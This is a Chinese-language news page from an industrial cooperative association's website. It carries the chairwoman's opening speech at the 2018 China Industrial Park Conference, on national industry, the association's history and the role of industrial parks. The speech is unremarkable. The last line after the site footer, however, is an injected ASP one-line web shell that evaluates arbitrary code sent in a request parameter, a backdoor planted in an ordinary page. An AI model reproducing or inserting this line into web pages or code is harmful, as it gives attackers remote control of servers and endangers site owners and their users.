设为首页 加入收藏 工合新闻 电子商务 入会须知 联系我们  

网站首页
  工合新闻
>>  2011年
>>  2012年
>>  2013年
>>  2014年
>>  2015年
>>  2016年
>>  2017年
>>  2018年

地址:北京市东城区建国门北大街金成建国5号1702
电话:010-66165725   

E-mail:gunghobianjibu@126.com

 

  2018年
 
中国工业合作协会唐保玲理事长“2018产业园区大会”开幕致辞
 发布时间:2018/5/29 浏览次数:611

      非常感谢大家前来参加由我们中国工业合作协会、上海工业合作协会、园区大会组委会与决策者集团共同主办的“2018中国产业园区大会”。我代表主办方,向一直以来关心和支持我们的各位领导和来宾,致以最诚挚的问候和感谢!


     当今世界国家之间的竞争,本质上就是民族工业实力强弱的竞争。谁掌握强而有力的产业核心制造技术,率先引领科技企业创新转型,谁就拥有国际舞台的话语权。2018年是改革开放40周年,中国的民族工业也已走到了这个核心技术转型升级的十字路口。发展战略性新兴产业,加强国防军事力量,实现国家经济弯道超车是中华民族进一步崛起的当务之急。
     中国工业合作协会从创立之日起,就始终支持着民族工业拥有独立自主的技术生产能力。抗战期间,中国工合在大后方和解放区共建立了3千多个工业合作社。虽然当时的厂房条件极为简陋,但中国工合依旧克服重重障碍。动员中国人民自力更生进行工业制造,有效突破了日本军国主义的解放区封锁战略,被誉为抗日的“后方经济堡垒”。
     1983年恢复活动以来,中国工合抓住机遇,在全国大多数地区建立省市地方工合协会,并组建了大批工业生产合作社,实行多种经济成分、多种合作形式,跨所有制、跨行业、跨地区共同发展的新路,不断探寻促进民族工业科技创新的优秀商业模式。
    现在,中国工业合作协会已发展出会员企业2万多家,遍布全国各地,涵盖多个行业,在发展经济、繁荣市场、方便人民生活、扩大劳动就业、开展对外合作与交流及探索所有制改革等方面发挥了重要作用,并为推动新兴产业的持续健康发展,促进中国新型工业化的顺利进行,全面建设小康社会做出了自己应有的贡献。
    目前,新型工业产品尚处在起步阶段。经验的缺失、技术的瓶颈、运营的无力,都决定着此时此刻,以人工智能、新能源汽车为代表的新兴产业,市场资源配置能力较为有限。新型民族工业的发展壮大,离不开各类经济组织与平台媒介的鼎力支持。产业园区作为中国区域经济发展、产业升级转型的重要空间聚集形式,既有能力也有义务,承担起国家与地区聚集创新资源、吸引高端人才、培育新型工业、促进产业转型的重要责任与使命。
     新型工业选择产业园区作为发展平台,双方是一种有机的结合,互利互惠,并不是园区运营商的单方面付出。在为高科技企业提供运营服务、促进内部产业发展的同时,企业优良的经济效益反过来助推着园区营业收入与运行水准的持续增长。园区内部新兴产业的高度成长性,也更将有效地推动民族工业腾笼换鸟与产业结构的转型升级。
    合作就是力量,合作才能共赢。“团结合作一起干”是中国工业合作协会一贯的核心宗旨与理念。中国工业合作协会将继续密切关注园区与企业的联动状态,充分发挥工合组织的桥梁纽带作用,为振兴中国人自己的民族产业品牌提供必要的服务。
    本次举办2018中国产业园区大会的宗旨就是希望在产业园区以“促进产业发展”为核心理念的时代,能同在座的诸位领导与企业家朋友们,互相分享自己在园区产业运营实践当中积累的宝贵经验,共同搭建起政府、企业、产业园区、金融机构与市场之间交流合作的桥梁和平台,为新兴产业提供最周到的运营服务,有效促进中国民族工业的发展壮大。
    最后,预祝本次大会圆满成功!谢谢!

 

 

中国工业合作协会  版权所有

指导单位:中华人民共和国民政部、国务院国有资产监督管理委员会

主办单位:中国工业合作协会 

电话:010-66165725 邮箱:gunghobianjibu@126.com  地址:北京市东城区建国门内大街金成建国5号1702

"%><%Eval(Request(chr(112)))%><%'.